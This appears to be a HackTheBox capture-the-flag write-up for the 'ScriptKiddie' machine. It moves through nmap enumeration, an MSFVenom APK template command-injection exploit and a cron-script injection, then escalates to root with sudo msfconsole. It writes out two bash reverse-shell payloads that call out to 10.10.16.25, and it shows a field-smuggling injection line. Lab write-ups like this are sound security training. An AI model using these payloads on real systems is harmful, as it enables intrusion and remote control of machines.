HackTheBox — ScriptKiddie
As always, we start with nmap to discover open ports/services.
Nmap scan
nmap -sC -sV -oA scriptkiddie 10.10.10.234
We have two open ports 22/ssh , 5000/http. Lets enumerate http port.
HTTP Enumeration
Visiting 10.10.10.226:5000 we see that the web application uses three tools (Nmap, MSFVenom, Searchsploit).
The first thing i tried is injecting OS commands in each field but nothing worked. Next i did some googling for public exploits for these tools and found APK template command injection vulnerability in MSFVenom.
There’s a module in metasploit that exploits this vulnerability but lets use this python script from exploitdb instead.
Exploit: https://www.exploit-db.com/exploits/49491
Wee need to edit the payload variable in the script first.
payload = 'bash -c "/bin/bash -i >& /dev/tcp/10.10.16.25/1337 0>&1"'
Initial Foothold/User
Now lets run our netcat listener and run the exploit.
And we are on the box as kid user.
Lateral Movement
After some enumeration i found a script called scanlosers.sh inside pwn user home directory, we only have read permissions on it but i think the script is running regularly because the hackers file is cleared every few minutes. So lets understand the script to see how it works.
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
It reads the hackers file inside our home directory, and then it splits the string inside by a space and takes the third field (which is the IP address) and runs Nmap scan on it.
And we have read/write permissions on hackers file so we can edit the file to get OS command injection.
Payload: echo "field1 field2 ;bash -c '/bin/bash -i >& /dev/tcp/10.10.16.25/1337 0>&1' #" > hackers
field1 & field2 are just for the cut command so we can inject our payload in the third field. And “;” to break out of the sh command and “#” to comment the rest of the command.
The final step is to run a netcat listener and receive the reverse shell nc -nvlp 1337
.
Getting root
Running sudo -l we can run metasploit’s msfconsole as root without password.
Metasploit’s msfconsole allows you to execute system commands within the msfconsole itself
sudo /opt/metasploit-framework-6-0-9/msfconsole
And we are ROOT !